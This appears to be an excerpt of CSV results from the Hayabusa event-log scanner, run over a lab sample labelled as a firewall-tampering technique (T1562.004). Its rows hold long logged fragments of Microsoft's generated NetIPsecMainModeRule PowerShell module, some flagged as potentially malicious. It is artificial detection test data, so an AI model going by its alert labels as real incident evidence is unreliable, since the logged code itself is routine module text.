[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 